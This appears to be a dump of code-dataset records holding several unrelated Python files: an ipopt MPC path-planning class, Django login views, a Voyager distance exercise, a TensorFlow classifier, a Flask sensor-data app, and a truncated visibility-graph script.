import *\nimport globalVars\n\nclass nlpProb(object):\n\n def __init__(self, N, T, t0, x0, x00_23, ncons, nu, path, obstacle, posIdx,\n ns_option, V_cmd, lb_VTerm, lb_VdotVal, delChi_max, obstacleID, fHandleCost = None):\n try:\n self.N = N\n self.T = T\n self.t0 = t0\n self.x0 = x0\n self.ncons = ncons # number of constraints\n self.ncons_vary = np.copy(ncons)\n self.nu = nu # number of controls\n self.path = path\n self.obstacle = obstacle\n self.posIdx = posIdx\n self.ns_option = ns_option\n self.V_cmd = V_cmd\n self.lb_VTerm = lb_VTerm\n self.lb_VdotVal = lb_VdotVal\n self.fHandleCost = fHandleCost\n self.addObstacleConstraints = False\n self.obstacleNumber = np.array([], dtype=int)\n self.delChi_max = delChi_max\n self.obstacleID = obstacleID\n self.x00_23 = x00_23\n\n useOnlyObstaclesInView = True\n\n if useOnlyObstaclesInView:\n nObstacle = len(obstacle.N)\n if nObstacle > 0:\n for j in range(nObstacle):\n \n p1 = x0[0:2]\n p2 = np.array([obstacle.E[j], obstacle.N[j]])\n distToObstacle = distance(p1, p2)\n \n #print('{0:.1f}, {1:.1f}'.format(distToObstacle, safeDistance))\n \n if distToObstacle < safeDistance:\n self.addObstacleConstraints = True\n self.obstacleNumber = np.concatenate([self.obstacleNumber, np.array([j])])\n self.ncons_vary += N\n\n else:\n nObstacle = len(obstacleID)\n if nObstacle > 0:\n for j in range(nObstacle):\n \n id = obstacleID[j]\n p1 = x0[0:2]\n p2 = np.array([obstacle.E[id], obstacle.N[id]])\n distToObstacle = distance(p1, p2)\n \n # print('{0:.1f}, {1:.1f}'.format(distToObstacle, safeDistance))\n \n if distToObstacle < safeDistance:\n self.addObstacleConstraints = True\n self.obstacleNumber = np.concatenate([self.obstacleNumber, np.array([id]) ])\n self.ncons_vary += N\n\n pass\n except:\n print('Error in init')\n\n def objective(self, u):\n N = self.N\n T = self.T\n t0 = self.t0\n x0 = self.x0\n path = self.path\n obstacle = self.obstacle\n posIdx = self.posIdx\n V_cmd = self.V_cmd\n fHandleCost = self.fHandleCost\n x00_23 = 
self.x00_23\n\n x = prob.computeOpenloopSolution(u, N, T, t0, x0, x00_23)\n costvec = np.zeros([3*N+2, 1])\n\n for k in range(N):\n uk = np.array([u[k],u[k+N]])\n costout = prob.runningCosts(uk, x[k], t0 + k*T, path, obstacle, posIdx, V_cmd)\n costvec[k] = costout[0] # V\n costvec[k+N] = costout[1] # Vdot or Vddot\n costvec[k+2*N] = costout[2] # Chidot or Chiddot\n\n cost_goalDist, cost_goalDelChi = prob.goalCost(x0, t0)\n #cost_goalDist, cost_goalDelChi = prob.goalCost(x[-1,:], t0)\n costvec[3*N] = cost_goalDist # goal dist\n costvec[3*N+1] = cost_goalDelChi # goal delta chi\n\n cost = np.sum(costvec)\n\n\n # write data once for analysis later using a global variable. other mentioned can be developed to not use the\n # global variable - but this was the least intrusive way of adding the functionality\n if globalVars.writeToFileCost == True:\n for k in range(3*N):\n fHandleCost.write('%.2f ' %(costvec[k]) )\n fHandleCost.write('%.2f ' % (costvec[3*N]))\n fHandleCost.write('%.2f ' % (costvec[3*N+1]))\n fHandleCost.write('\\n')\n globalVars.writeToFileCost = False\n\n return cost\n\n\n def gradient(self, u):\n N = self.N\n nu = self.nu\n\n eps = 1e-2\n obj_grad_u = np.zeros(nu*N)\n for k in range(nu*N):\n uplus = np.copy(u)\n uminus = np.copy(u)\n\n uplus[k] = uplus[k] + eps\n obj_uplus = self.objective(uplus)\n\n uminus[k] = uminus[k] - eps\n obj_uminus = self.objective(uminus)\n\n obj_grad_u[k] = (obj_uplus - obj_uminus) / (2 * eps)\n\n return obj_grad_u\n\n\n def constraints(self, u):\n try:\n N = self.N\n T = self.T\n t0 = self.t0\n x0 = self.x0\n path = self.path\n obstacle = self.obstacle\n posIdx = self.posIdx\n ns_option = self.ns_option\n x00_23 = self.x00_23\n\n x = prob.computeOpenloopSolution(u, N, T, t0, x0, x00_23)\n\n consR1 = np.array([], dtype=float)\n\n if ns == 6:\n\n if ns_option == 1: # Additional Current velocity + Terminal velocity constraint\n\n consR2 = np.array([x[0, idx_V] * x[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n 
consR3 = np.array([x[0, idx_V]]) # current velocity\n\n constmp = np.concatenate([consR1, consR2])\n consR = np.concatenate([constmp, consR3])\n\n # terminal constraint (dy, V, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = np.concatenate([consT2, consT3])\n\n elif ns_option == 2:\n\n # No terminal velocity constraint\n consR2 = np.array([x[0, idx_V] * x[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, dV, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = np.concatenate([consT2, consT3])\n\n elif ns_option == 3:\n\n # No terminal velocity constraint\n consR2 = np.array([x[0, idx_V] * x[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, V, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = consT3\n\n elif ns == 4:\n\n if ns_option == 1:\n\n u_mat = u.reshape(2, -1).T\n consR2 = np.array([x[0, idx_V] * u_mat[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n consR3 = np.array([x[0, idx_V]]) # current velocity\n\n constmp = np.concatenate([consR1, consR2])\n consR = np.concatenate([constmp, consR3])\n\n # terminal constraint (dy, dV, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = np.concatenate([consT2, consT3])\n\n elif ns_option == 2:\n\n u_mat = u.reshape(2, -1).T\n consR2 = np.array([x[0, idx_V] * u_mat[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, V, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N-1], t0, path, obstacle, posIdx) # ydist, VEnd\n consT = np.concatenate([consT2, consT3])\n\n\n elif ns_option == 3:\n\n u_mat = u.reshape(2,-1).T\n consR2 = np.array([x[0, idx_V] * 
u_mat[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, dV, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N-1], t0, path, obstacle, posIdx) # ydist, VEnd\n consT = consT3\n\n # total constraints without obstacles\n cons = np.concatenate([consR,consT])\n\n # total constraints with obstacles\n if self.addObstacleConstraints == True:\n\n for j in self.obstacleNumber:\n for k in range(N):\n position = x[k][0:2]\n obstacleDistance = np.sqrt([(obstacle.E[j] - position[0]) ** 2 +\n (obstacle.N[j] - position[1]) ** 2])\n cons = np.concatenate([cons, obstacleDistance])\n\n return cons\n except:\n print('Error in constraints')\n\n def jacobian(self, u):\n try:\n N = self.N\n ncons_vary = self.ncons_vary\n nu = self.nu\n jac = np.zeros([ncons_vary,nu*N])\n eps = 1e-2\n\n for j in range(ncons_vary):\n\n for k in range(nu*N):\n uplus = np.copy(u)\n uminus = np.copy(u)\n\n uplus[k] = uplus[k] + eps\n cons_uplus = self.constraints(uplus)\n\n uminus[k] = uminus[k] - eps\n cons_uminus = self.constraints(uminus)\n\n jac[j,k] = (cons_uplus[j] - cons_uminus[j]) / (2 * eps)\n\n return jac.flatten()\n except:\n print('Error in jacobian')\n\n\n def setup(self, u0):\n try:\n N = self.N\n T = self.T\n t0 = self.t0\n x0 = self.x0\n nu = self.nu\n path = self.path\n obstacle = self.obstacle\n posIdx = self.posIdx\n ns_option = self.ns_option\n V_cmd = self.V_cmd\n lb_VTerm = self.lb_VTerm\n lb_VdotVal = self.lb_VdotVal\n fHandleCost = self.fHandleCost\n delChi_max = self.delChi_max\n obstacleID = self.obstacleID\n x00_23 = self.x00_23\n\n LARGE_NO = 1e12\n\n if ns == 6:\n\n lb_Vddot = np.ones([N,1])*lb_VddotVal\n lb_Chiddot = np.ones([N,1])*lb_ChiddotVal\n\n ub_Vddot = np.ones([N,1])*ub_VddotVal\n ub_Chiddot = np.ones([N,1])*ub_ChiddotVal\n\n lb = np.concatenate([lb_Vddot, lb_Chiddot])\n ub = np.concatenate([ub_Vddot,ub_Chiddot])\n\n elif ns == 4:\n\n lb_Vdot = np.ones([N, 1]) * lb_VdotVal\n 
lb_Chidot = np.ones([N, 1]) * lb_ChidotVal\n\n ub_Vdot = np.ones([N, 1]) * ub_VdotVal\n ub_Chidot = np.ones([N, 1]) * ub_ChidotVal\n\n lb = np.concatenate([lb_Vdot, lb_Chidot])\n ub = np.concatenate([ub_Vdot, ub_Chidot])\n\n\n lataccel_max = lataccel_maxVal\n\n cl_running = np.array([], dtype=float)\n cu_running = np.array([], dtype=float)\n\n cl_tmp1 = np.concatenate([cl_running, [-lataccel_max]])\n cu_tmp1 = np.concatenate([cu_running, [+lataccel_max]])\n\n #u_approx = u0.flatten(1)\n #x = prob.computeOpenloopSolution(u_approx, N, T, t0, x0)\n\n if ns_option == 1:\n\n # Speed Constraint\n cl_tmp2 = np.concatenate([cl_tmp1, [lb_V]])\n cu_tmp2 = np.concatenate([cu_tmp1, [ub_V]])\n\n # Terminal Constraint - V\n tmp = 0\n cl_tmp3 = np.concatenate([cl_tmp2, [tmp]]) # need to modify\n cu_tmp3 = np.concatenate([cu_tmp2, [tmp]])\n\n # Terminal Constraint - delChi\n cl = np.concatenate([cl_tmp3, [-delChi_max]])\n cu = np.concatenate([cu_tmp3, [+delChi_max]])\n\n\n elif ns_option == 2:\n\n cl_tmp2 = cl_tmp1\n cu_tmp2 = cu_tmp1\n\n cl_tmp3 = np.concatenate([cl_tmp2, [lb_VTerm]])\n cu_tmp3 = np.concatenate([cu_tmp2, [ub_VTerm]])\n\n # Terminal Constraint - delChi\n cl = np.concatenate([cl_tmp3, [-delChi_max]])\n cu = np.concatenate([cu_tmp3, [+delChi_max]])\n\n elif ns_option == 3:\n\n cl = np.concatenate([cl_tmp1, [-delChi_max]])\n cu = np.concatenate([cu_tmp1, [+delChi_max]])\n\n # total constraints with obstacles\n\n if self.addObstacleConstraints == True:\n\n #print(self.obstacleNumber)\n for j in self.obstacleNumber:\n for k in range(N):\n cl = np.concatenate([cl, [obstacle.sr[j]]])\n cu = np.concatenate([cu, [LARGE_NO]])\n\n nlp = ipopt.problem(\n n=nu*N,\n m=len(cl),\n problem_obj=nlpProb(N, T, t0, x0, x00_23, ncons, nu, path,\n obstacle, posIdx, ns_option, V_cmd,\n lb_VTerm, lb_VdotVal, delChi_max, obstacleID, fHandleCost),\n lb=lb,\n ub=ub,\n cl=cl,\n cu=cu\n )\n #print(len(cl))\n nlp.addOption('print_level', nlpPrintLevel)\n nlp.addOption('max_iter', nlpMaxIter)\n 
#nlp.addOption('dual_inf_tol',10.0) # defaut = 1\n nlp.addOption('constr_viol_tol',1e-4) # default = 1e-4\n nlp.addOption('compl_inf_tol',1e-4) # default = 1e-4\n nlp.addOption('acceptable_tol',1e-6) # default = 1e-6\n nlp.addOption('acceptable_constr_viol_tol',0.01) # default = 0.01\n\n return nlp\n except:\n print('Error in setup')","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":13932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"185026037","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login\nfrom .forms import LoginForm, UserRegistrationForm\nfrom .models import Profile\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\ndef user_login(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(username=cd['username'],\n password=cd['password'])\n\n if user is not None:\n if user.is_active:\n login(request, user)\n try:\n redirect_url = request.get_full_path().split('?next=')[1]\n except:\n redirect_url=\"/\"\n # print(request.build_absolute_uri(redirect_url))\n return redirect(redirect_url)\n # return HttpResponse('Authenticated successfully')\n else:\n return HttpResponse('Disabled account')\n else:\n return HttpResponse('Invalid login')\n else:\n form = LoginForm()\n return render(request, 'account/login.html', {'form': form})\n\n\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # Create a new user object but avoid saving it yet\n new_user = user_form.save(commit=False)\n # Set the chosen password\n new_user.set_password(user_form.cleaned_data['password'])\n # Save the User object\n new_user.save()\n # Create the user profile\n profile = 
Profile.objects.create(user=new_user)\n return render(request,\n 'account/register_done.html',\n {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n return render(request,\n 'account/register.html',\n {'user_form': user_form})\n\n\n\n\nfrom .forms import UserEditForm, ProfileEditForm\n\n@login_required(login_url=\"/account/login/\")\ndef edit(request):\n if request.method == 'POST':\n user_form = UserEditForm(data=request.POST)\n profile_form = ProfileEditForm(data=request.POST,\n files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, 'Profile updated successfully')\n else:\n messages.error(request, 'Profile updated Error')\n else:\n user_form = UserEditForm()\n profile_form = ProfileEditForm()\n return render(request,\n 'account/edit.html',\n {'user_form': user_form,\n 'profile_form': profile_form})\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140354800","text":"\"\"\"\nThe Voyager 1 spacecraft, launched September 15, 1977, is the farthest-traveling Earthmade\nobject. It is presently on the outer edges of our solar system. The NASA update\npage on September 25, 2009, reported it as being a distance of approximately\n16,637,000,000 miles from the sun, traveling away from the sun at 38,241 miles/hour.\nWrite a program that will prompt the user for an integer number that indicates the\nnumber of days after 9/25/09. You will calculate the distance of Voyager from the sun\nusing the numbers from 9/25/09 (assume that velocity is constant) plus the entered\nnumber of days, and report:\n\u0002 Distance in miles\n\u0002 Distance in kilometers (1.609344 kilometers/mile)\nDistance in astronomical units (AU, 92,955,887.6 miles/AU)\n\u0002 Round-trip time for radio communication in hours. 
Radio waves travel at the speed\nof light, listed at 299,792,458 meters/second.\nhttp://voyager.jpl.nasa.gov/where/index.html\n\"\"\"\nfrom datetime import datetime\n\ndays_launch_now = (datetime.now() - datetime(1977, 9, 15)).days\ndays_launch_09 = (datetime(2009, 9, 25) - datetime(1977, 9, 15)).days\ndays_09_15 = (datetime.now() - datetime(2009, 9, 25)).days\ndistance_09 = 16637000000\ndistance_now = round(distance_09 / days_launch_09 * days_launch_now)\nprint(distance_now)\ndistance_km = round(distance_now * 1.609344)\nprint(distance_km)\ndistance_AU = round(distance_now / 92955887.6)\nprint(distance_AU)\n\nmiles_per_day = 38241 * 24\nnew_distance = days_launch_now * miles_per_day\nprint(round(new_distance))\nnew_km = 1.609344 * new_distance\nprint(new_km)\n\nmeter_hour = 299792458 * 3600\ntime_return = 1000 * new_km * 2 / meter_hour\n\nprint(time_return)","sub_path":"chapter 1/where_is_voyager.py","file_name":"where_is_voyager.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298087694","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom read_datas import *\n\ndef deepnn(x):\n \"\"\"deepnn builds the graph for a deep net for classifying digits.\n\n Args:\n x: an input tensor with the dimensions (N_examples, 784), where 784 is the\n number of pixels in a standard MNIST image.\n\n Returns:\n A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with values\n equal to the logits of classifying the digit into one of 10 classes (the\n digits 0-9). 
keep_prob is a scalar placeholder for the probability of\n dropout.\n \"\"\"\n # Reshape to use within a convolutional neural net.\n # Last dimension is for \"features\" - there is only one here, since images are\n # grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.\n with tf.name_scope('reshape'):\n x_image = tf.reshape(x, [-1, 6, 9, 1])\n\n # First convolutional layer - maps one grayscale image to 32 feature maps.\n with tf.name_scope('conv1'):\n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\n # Pooling layer - downsamples by 2X.\n with tf.name_scope('pool1'):\n h_pool1 = max_pool_2x2(h_conv1)\n\n # Second convolutional layer -- maps 32 feature maps to 64.\n with tf.name_scope('conv2'):\n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\n # Second pooling layer.\n with tf.name_scope('pool2'):\n h_pool2 = max_pool_2x2(h_conv2)\n\n # Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image\n # is down to 7x7x64 feature maps -- maps this to 1024 features.\n with tf.name_scope('fc1'):\n W_fc1 = weight_variable([2 * 3 * 64, 1024])\n b_fc1 = bias_variable([1024])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 2*3*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n # Dropout - controls the complexity of the model, prevents co-adaptation of\n # features.\n with tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n # Map the 1024 features to 10 classes, one for each digit\n with tf.name_scope('fc2'):\n W_fc2 = weight_variable([1024, 2])\n b_fc2 = bias_variable([2])\n\n y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n return y_conv, keep_prob\n\n\ndef conv2d(x, W):\n \"\"\"conv2d returns a 2d convolution layer with full stride.\"\"\"\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], 
padding='SAME')\n\n\ndef max_pool_2x2(x):\n \"\"\"max_pool_2x2 downsamples a feature map by 2X.\"\"\"\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef weight_variable(shape):\n \"\"\"weight_variable generates a weight variable of a given shape.\"\"\"\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n \"\"\"bias_variable generates a bias variable of a given shape.\"\"\"\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef main(_):\n # Import data\n df = pd.read_csv(\"data/train.csv\")\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, 54])\n\n # Define loss and optimizer\n y_ = tf.placeholder(tf.float32, [None, 2])\n\n # Build the graph for the deep net\n y, keep_prob = deepnn(x)\n\n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n # cross_entropy = tf.reduce_mean(\n # tf.nn.sigmoid_cross_entropy_with_logits(labels=y_, logits=y))\n\n # train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\n sess = tf.InteractiveSession()\n tf.global_variables_initializer().run()\n\n # Feature extraction\n feature_M, labels_M = preproceesing(df)\n # print feature_M[0:2], labels_M[0:2]\n\n step_size = 2000\n batch_size = 100\n\n # Train\n for i in range(step_size):\n batch_xs, batch_ys = feature_M[i*batch_size:(i+1)*batch_size], labels_M[i*batch_size:(i+1)*batch_size]\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})\n\n # Test trained model\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n acry_rate_t = 0.0\n for j in range((len(labels_M)-step_size*batch_size)//batch_size):\n i += 1\n acry_rate = sess.run(accuracy, feed_dict={x: feature_M[i*batch_size:(i+1)*batch_size],\n y_: 
labels_M[i*batch_size:(i+1)*batch_size],\n keep_prob: 0.5})\n acry_rate_t += acry_rate\n print(acry_rate)\n print(\"-- Accuracy in total:\",acry_rate_t/j)\n print('test accuracy %g' % accuracy.eval(feed_dict={\n x: feature_M[step_size*batch_size+1:], y_: labels_M[step_size*batch_size+1:], keep_prob: 1.0}))\n\n\nif __name__ == '__main__':\n tf.app.run(main=main)\n","sub_path":"training_model_deep.py","file_name":"training_model_deep.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"353506293","text":"# main file for whole database program\n# it's a controller for whole thing - royce wilson\n\n# imports!\nfrom datetime import datetime\nimport time\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash, jsonify, Response, send_from_directory\nfrom werkzeug.routing import BaseConverter\nfrom db.db_init import connect_db, db_resource\nfrom xbeecom import xbeecom\nfrom models.sample import Samples\nimport sys\nimport os\nimport itertools\nimport operator\nimport logging\n\n\nlogging.basicConfig(format=\"[%(asctime)s %(name)s %(levelname)s] %(message)s\",\n filename=\"log.log\",\n level=logging.DEBUG)\n\n\n# creation!\napp = Flask(__name__)\napp.config.from_object('db.dbconfig')\n\n\nclass ListConverter(BaseConverter):\n def to_python(self, value):\n return value.split(\"+\")\n\n def to_url(self, values):\n return \"+\".join(map(BaseConverter.to_url, values))\napp.url_map.converters[\"list\"] = ListConverter\n\n\niso_format_string = \"%Y-%m-%dT%H:%M:%S\"\n@app.context_processor\ndef utility_processor():\n def format_date(time):\n return datetime.utcfromtimestamp(time).strftime(\"%Y-%m-%d %H:%M:%S\")\n return dict(format_date=format_date)\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db(app)\n\n\n@app.teardown_request\ndef teardown_request(excetion):\n db = getattr(g, 'db', None)\n if db is not None:\n 
db.close()\n\n\n#@app.route('/')\ndef dashboard():\n recent_samples = Samples.get_status(g.db)\n recent_samples = [dict(zip(recent_samples[\"fields\"], sample))\n for sample in recent_samples[\"results\"]]\n for node in recent_samples:\n node[\"dt\"] = datetime.strptime(node[\"time\"], iso_format_string)\n node[\"delta\"] = datetime.now() - node[\"dt\"]\n return render_template('dashboard.html', nodes=recent_samples)\n\n\n@app.route('/')\ndef graph():\n recent_samples = Samples.get_status(g.db)\n recent_samples = [dict(zip(recent_samples[\"fields\"], sample))\n for sample in recent_samples[\"results\"]]\n return render_template('graph2.html', nodes=range(1,8))\n\n\n@app.route('/download', methods=['GET', 'POST'])\ndef download():\n if request.method == 'POST':\n try:\n nodes = [int(n.partition('-')[-1])\n for n in request.form.keys()\n if n.startswith('node-')]\n nodes = set(nodes) & set(range(1, 8))\n except ValueError:\n pass\n\n # strip field- off of post parameters\n fields = [f.partition('-')[-1]\n for f in request.form.keys()\n if f.startswith('field-')]\n # only include actual field names\n fields = set(fields) & set(Samples._fields)\n\n start_date = int(time.mktime(datetime.strptime(request.form['start'], '%m/%d/%Y').timetuple()))\n end_date = int(time.mktime(datetime.strptime(request.form['end'], '%m/%d/%Y').timetuple()))\n end_date += 60*60*24\n\n result = Samples.get_samples(g.db, start_date, end_date, nodes,\n [f for f in Samples._fields if f in fields])\n csv = ','.join(result['fields']) + '\\n'\n csv += '\\n'.join(','.join(map(str, row)) for row in result['results'])\n return Response(\n csv,\n mimetype=\"text/csv\",\n headers={\"Content-disposition\":\n \"attachment; filename=data.csv\"})\n else:\n return render_template('download.html', nodes=range(1,8), fields=Samples.descriptions)\n\n@app.route('/data/status')\ndef node_status():\n return jsonify(Samples.get_status(g.db))\n\n\n@app.route(\"/data\")\ndef get_samples():\n try:\n start_date = 
request.args.get(\"start\")\n if start_date is not None:\n start_date = int(start_date) / 1000\n\n end_date = request.args.get(\"end\")\n if end_date is not None:\n end_date = int(end_date) / 1000\n\n nodes = request.args.get(\"nodes\")\n if nodes is not None:\n nodes = tuple(set(map(int, (n for n in nodes.split(\"+\")))))\n\n y_axis = request.args.get(\"field_y\")\n x_axis = request.args.get(\"field_x\")\n fields = set((y_axis, x_axis)) & set(Samples._fields)\n fields |= set((\"n_id\",))\n if len(fields) != 3:\n return jsonify({\"error\": \"Invalid axes.\"})\n except ValueError as e:\n return jsonify({\"error\": \"Error parsing fields: {0}\".format(e)})\n\n samples = Samples.get_samples(g.db, start_date, end_date,\n nodes, fields, exact_time=False)\n node_id_offset = samples[\"fields\"].index(\"n_id\")\n groups = itertools.groupby(samples[\"results\"],\n operator.itemgetter(node_id_offset))\n y_axis_offset = samples[\"fields\"].index(y_axis)\n chart_response = {\n \"start\": start_date*1000,\n \"end\": end_date*1000,\n \"series\": {\n k: [(s.time*1000, s[y_axis_offset]) for s in g]\n for k, g in groups\n }\n }\n\n return jsonify(chart_response)\n\n@app.route(\"/database\")\ndef get_database():\n return send_from_directory(os.path.dirname(__file__), \"database.db\")\n\n\n# -----------------------------------------------\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1 and sys.argv[1] == \"demo\":\n logging.info(\"starting in demo mode\")\n app.run(debug=True, host='0.0.0.0')\n else:\n with xbeecom(db_resource(app)) as xbee:\n app.run(debug=False, host='0.0.0.0')\n","sub_path":"flaskr.py","file_name":"flaskr.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"325084336","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nimport networkx as nx\nfrom vis_py import *\nfrom itertools import chain\nimport matplotlib.pyplot as plt\nimport 
copy\n\n\n'''df = np.genfromtxt('./data/italy.csv', delimiter=',')\ndf = df.reshape(len(df), 1)\ntime = np.arange(len(df), dtype=int).reshape(len(df), 1)\ndf = np.concatenate([time, df], axis=1)\n\n\n\nfor t in range(100, 1000, 100):\n df_temp = df[t - 100:t, :]\n W = visibility_graph(df_temp, directed=False)\n # W = np.heaviside(W, 0).astype(int)\n\n import matplotlib.pylab as plt\n import scipy.sparse as sps\n\n M = sps.csr_matrix(W)\n plt.spy(M)\n plt.show()\n\n plt.plot(df_temp[:, 0], df_temp[:, 1] / max(df_temp[:, 1]))\n plt.plot(df_temp[:, 0], np.sum(W, axis=1) / max(np.sum(W, axis=1)))\n plt.show()\n\n G_weight = nx.convert_matrix.from_numpy_matrix(W, create_using=nx.Graph)\n W = np.heaviside(W, 0).astype(int)\n G_unweight = nx.convert_matrix.from_numpy_matrix(W, create_using=nx.Graph)\n\n nx.draw(G_unweight, node_size=1)\n plt.draw()\n plt.show()'''\n\n# Placeholders to feed train and test data into the graph.\n# Since batch dimension is 'None', we can reuse them both for train and eval.\nclass get_data():\n def __init__(self):\n df = np.genfromtxt('./data/italy.csv', delimiter=',')\n df = df.reshape(len(df), 1)\n self.T = len(df)\n time = np.arange(len(df), dtype=int).reshape(self.T, 1)\n\n df = np.concatenate([time, df], axis=1)\n feature_matrix = np.zeros(shape=(self.T - 100, 17))\n label_vector = np.zeros(shape=(self.T - 100, 1))\n #get visibility graphs\n for t in range(100, self.T, 1):\n print(t, df[t, 1])\n df_temp = df[t - 100:t, :]\n W = visibility_graph(df_temp, directed=False)\n G = nx.convert_matrix.from_numpy_matrix(W, create_using=nx.Graph)\n\n avg_degree, avg_strength, std_strength, avg_clustering, diameter, degree_correlation, eigen_max, degrees_to_print = get_measures(G, W)\n last_prices = df[(t - 5):t, 1]\n to_add = np.concatenate([[avg_degree, avg_strength, std_strength, avg_clustering, diameter, degree_correlation, eigen_max], degrees_to_print, last_prices])\n feature_matrix[t - 100, :] += to_add\n label_vector[t - 100, :] += df[t, 
1]\n\n self.feature_matrix = feature_matrix\n self.label_vector = label_vector\n self.count = 0\n\n\n def __call__(self):\n\n to_return = self.feature_matrix[ self.count : (self.count+batch_size), :], self.label_vector[ self.count : (self.count+batch_size), :]\n self.count += 1\n return to_return\n\n\n def all(self):\n to_return = self.feature_matrix, self.label_vector\n return to_return\n\n\n\n\n\n '''TFdataset = tf.data.Dataset.from_tensor_slices((feature_matrix, label_vector))\n\n dataset = TFdataset.repeat().batch(batch_size)\n\n iter = dataset.make_one_shot_iterator()\n return iter'''\n\n\ndef get_placeholders():\n x = tf.placeholder(tf.float32, [None, 17])\n y_ = tf.placeholder(tf.float32, [None, 1])\n return x, y_\n\n# Store results of runs with different configurations in a list.\n# Use a tuple (num_epochs, learning_rate) as keys, and a tuple (training_accuracy, testing_accuracy)\nexperiments_task1 = []\nsettings = [(5, 0.0001)]#, (5, 0.005), (15, 0.1)]\nlog_period_samples = 100\nbatch_size = 50\n\nprint('Training Model')\n# Train Model 1 with the different hyper-parameter settings.\nfor (num_epochs, learning_rate) in settings:\n\n # Reset graph, recreate placeholders and dataset.\n tf.reset_default_graph()\n x, y_ = get_placeholders()\n mnist = get_data()\n\n #####################################################\n # Define model, loss, update and evaluation metric. 
